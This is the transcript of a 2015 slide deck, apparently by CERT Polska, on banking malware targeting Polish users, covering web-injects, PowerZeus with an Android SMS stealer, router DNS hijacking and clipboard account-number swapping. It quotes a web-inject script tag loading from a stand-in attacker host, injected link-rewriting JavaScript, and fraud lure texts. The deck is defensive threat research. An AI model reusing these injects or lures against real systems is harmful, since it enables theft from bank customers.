The Polish Money Stealing Scene

The Polish Money Stealing Scene
Piotr Kijewski [email protected] @piotrkijewski 29th Jan 2015

Main actors •  Web-‐inject malware •  Hacked home
routers •  Home grown “middle income” “banking” malware that introduces new tricks 2

SupporGng actor •  Classic phishing sGll there • 
About 20 or so campaigns against Polish banks in 2014 •  Not so eﬀecGve against two factor authenGcaGon …. but they do collect data •  Widely reported in media, so bad PR for a bank 3

CASE STUDY #1: WEB-‐INJECT MALWARE 4

2014/2015 •  VMZeus/KINS •  Tinba •  Kronos
•  ISFB/Gozi2 5

“Man in the Browser” 6

Web-‐inject Target URL : “*/our internet bank/*” data_before
<head> data_aeer <body> data_inject <script type=“text/javascript” src=hhps:// evilserver.example/grabmoney.js”> </script> 7

Rise of the Inject Scenarios 8

Cybercrime made easy -‐ ATS 9

Scenarios •  Web-‐inject scenarios are at the core of
money thee •  Bad guys test transacGon systems for elements that they can leverage in scenarios •  Bad guys monitor ﬁnancial sector news & events to adapt scenarios •  Goal is to bypass two factor authenGcaGon by exploiGng the user 10

“Erroneous bank transfer” 11

“Deﬁned bank transfer” 12

“Deﬁned bank transfer” The Bank is changing the format
of the account. Please confirm the operation, including the new account number should be specified as a recipient defined. New account number will be active after 7 days if the operation is not confirmed, the adoption of transfers on your account will be impossible. Please enter the code SMS number: 334 Note: TranslaGon reﬂects original crappy Polish text 13

“Insurance” Because of the growing prevalence of fraudulent transactions
from accounts of customers all internet bank payments must be insured. payment amount for 300000zł - free payment amount over 300000zł - 50 zł Note: TranslaGon reﬂects original crappy Polish text 14

“Cannot idenGfy your computer” The alarm system is not
able to identify your computer. This may be due to a recent software update or a new IP address assigned by your ISP. In this case, you must authenticate the computer to avoid blocking the account. Please authorization by the token. Note: TranslaGon reﬂects original crappy Polish text 15

“Trusted phone number” We are updating the phone bank
for sms code of <insert bank name> banking system to the safety of our customers we introduce secure line connection. You need to activate the new code SMS We take care of the safety of the banking system <insert bank name> Note: TranslaGon reﬂects original crappy Polish text 16

QR codes anyone? 17

CASE STUDY #2: POWERZEUS + OTP STEALER APP SCENARIO
18

PowerZeus/KINS •  Started targeGng Polish users around July 2013
•  Combines 3 features: webinjects (Zeus), plugin API (SpyEye), code injecGon methods used by Power Loader (Alureon) •  Modules downloaded by framework (essenGally what PowerZeus is) •  Included a module we called zeus-‐dll (encrypted on disk) •  This parGcular instance aimed at installing the poland.apk, polska.apk, e-‐security.apk on an Android •  This instance used .ru domains for C&C and .pl domains for malicous app distribuGon 20

Command features … + steganography •  get info
– starts with #, phone no. somewhere in message •  new number – starts with /, phone no. somewhere in message •  ﬁn – starts with , •  uninstall –  starts with ! +34 668 … 21

Spanish connecGon … fonyou.es – turns out C&C
number was virtual 22

Sinkhole stats unique IPs/day Sample date: 12/11/2013
Takedown together with Kaspersky 23

CASE STUDY #3: HOME ROUTER HACKS 24

iPhone infecGon ??? 25

DNS redirecGon 26

Scenario 1 27

Scenario 1 The following code was injected in downloaded
HTML: <script> jQuery(document).ready(funcGon() { jQuery('a[href*="ebgz.pl"]').ahr('href','hhp://ssl-‐.ebgz.pl/'); jQuery('li p a.buhon.green').ahr('href','hhp://ssl-‐.ebgz.pl/'); }); </script> 28

Scenario 1 29

Scenario 2 30

CASE STUDY #4: BANATRIX AND FRIENDS 31

Bank Account Number (BAN) CCAAAAAAAABBBBBBBBBBBBBBBB CC
AAAA AAAA BBBB BBBB BBBB BBBB •  control sum (inline with IBAN standard) •  bank number •  account number 32

VBKlip / Banapter •  A simple piece of VB
(later variants in .NET) that alters contents of Windows clipboard. •  Any string of 26 digits (opGonally separated by whitespaces) is changed to another one. •  Early versions had the account number hardcoded, currently it’s updated from a C2 server. 33

Demo: hhp://youtu.be/TjOOaWE4Vq4 34

Nearly 500k PLN lost 35

Nearly 1mln PLN lost hhp://www.tvn24.pl/jaworzno-‐z-‐konta-‐zniknal-‐niemal-‐milion-‐zlotych,507306,s.html 36

Banatrix •  Banatrix scans memory of running processes that
match iexplore.exe, ﬁrefox.exe, chrome.exe, and opera.exe. •  Similar to VBKlip/Banapter, banatrix changes 26-‐digit strings to a diﬀerent one. •  Monitoring limited to one browser process, may crash browser. 37

Banatrix: C&C in .onion 38

Now with DGA 39

Demo: hhp://youtu.be/iyhRq7Pf1yY 40

Future Winner? •  Ransomware –  Older Weelsof/Reveton
in 2011/12 had massive impact –  InteresGngly, nothing much since then –  Cryptolocker, Cryptowall not really present •  But it will be bad when it hits 41

Something novel: Banking apps? Src: hhp://securityintelligence.com/svpeng-‐mobile-‐malware-‐ expanding-‐to-‐new-‐territories/#.VGTBZlfF95k 42

The trend we see: hacking the mind src: www.pocobor.com
43

Contact: [email protected], [email protected]
Twiher: @piotrkijewski, @cert_polska_en Web: www.cert.pl 44

The Polish Money Stealing Scene

The Polish Money Stealing Scene

More Decks by piotrk

Other Decks in Research

Featured

Transcript